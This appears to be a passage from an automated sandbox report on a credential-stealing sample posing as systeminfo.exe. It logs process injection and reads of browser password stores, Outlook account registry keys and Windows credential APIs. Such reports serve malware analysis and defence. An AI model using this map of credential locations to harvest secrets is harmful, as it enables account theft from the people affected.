File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Apple Computer\Preferences\keychain.plist, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera\wand.dat, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera7\profile\wand.dat, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Opera Software\Opera Stable\Login Data, type = file_attributes	1	Fn
File	Create	filename = C:\ProgramData\FB70.tmp, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ	1	Fn
File	Write	filename = C:\ProgramData\FB70.tmp, size = 3	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 11	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 9	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 8	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 17	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 15	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 14	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 12	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 13	1	Fn Data
File	Write	filename = C:\ProgramData\FB70.tmp, size = 2	1	Fn Data

Process #11: systeminfo.exe

(Host: 179, Network: 0)

Information	Value
ID	#11
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:08, Reason: Child Process
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:01:15

OS Process Information

Information	Value
PID	0x66c
Parent PID	0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 660 0x 890

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000e0000	0x000e0000	0x000e0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000100000	0x00100000	0x0010ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000360000	0x00360000	0x0039ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000400000	0x00400000	0x0041bfff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000420000	0x00420000	0x005a7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000005c0000	0x005c0000	0x0063ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000640000	0x00640000	0x007c0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000007e0000	0x007e0000	0x008dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000008e0000	0x008e0000	0x009dffff	Private Memory	Readable, Writable	Region Actions
3292.exe	0x00be0000	0x00bfefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000c00000	0x00c00000	0x01ffffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x02000000	0x022cefff	Memory Mapped File	Readable	Region Actions
private_0x0000000002360000	0x02360000	0x0245ffff	Private Memory	Readable, Writable	Region Actions
atl.dll	0x74130000	0x74143fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pstorec.dll	0x74150000	0x7415cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x742f0000	0x7448dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x746e0000	0x746e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x746f0000	0x7474bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74750000	0x7478efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x750c0000	0x750cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x758d0000	0x759ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comdlg32.dll	0x75bd0000	0x75c4afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75c50000	0x76899fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x84c	address = 0x400000, size = 114688	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x84c	address = 0x7efde008, size = 4	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x84c	address = 0x7efdf010, size = 4	1	Fn Data
Modify Control Flow	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x84c	os_tid = 0x660, address = 0x0	1	Fn

Threads

Thread 0x660

(Host: 178, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = private_0x0000000000400000, base_address = 0x400000	2	Fn
Module	Load	module_name = comctl32.dll, base_address = 0x742f0000	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, function = InitCommonControlsEx, address_out = 0x743109ce	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75c50000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x75e9fb26	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo_lng.ini, type = file_attributes	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Profiles, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Thunderbird\Profiles, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird	1	Fn
File	Get Info	filename = C:\Program Files (x86)\Mozilla Thunderbird, type = file_attributes	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = ShowGridLines, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = AddExportHeaderLine, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = WinPos	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = Columns	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = Sort, default_value = 0	1	Fn
Module	Load	module_name = pstorec.dll, base_address = 0x74150000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\pstorec.dll, function = PStoreCreateInstance, address_out = 0x7415526c	1	Fn
Module	Load	module_name = crypt32.dll, base_address = 0x758d0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x75905a7f	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x756e0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x757271c1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x756eb2ec	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x75727941	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x75727381	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x75727481	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Identities	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Identities	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}, value_name = Username, data = Main Identity, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Identities	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = POP3 User, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = IMAP User, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = HTTP User, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = SMTP User, data = 0, type = REG_NONE	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 User, data = sdjwh@dive.djh, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Server, data = fgerh, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Display Name, data = fvmmeu dufn, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Email, data = sdjwh@dive.djh, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Server, data = hthr, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Port, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Port, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Use SPA, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Password, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP User, data = 104, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP User, data = 104, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP User, data = 104, type = REG_NONE	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, data = 104, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP User, data = 104, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = HTTP User, data = 104, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, data = 104, type = REG_NONE	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
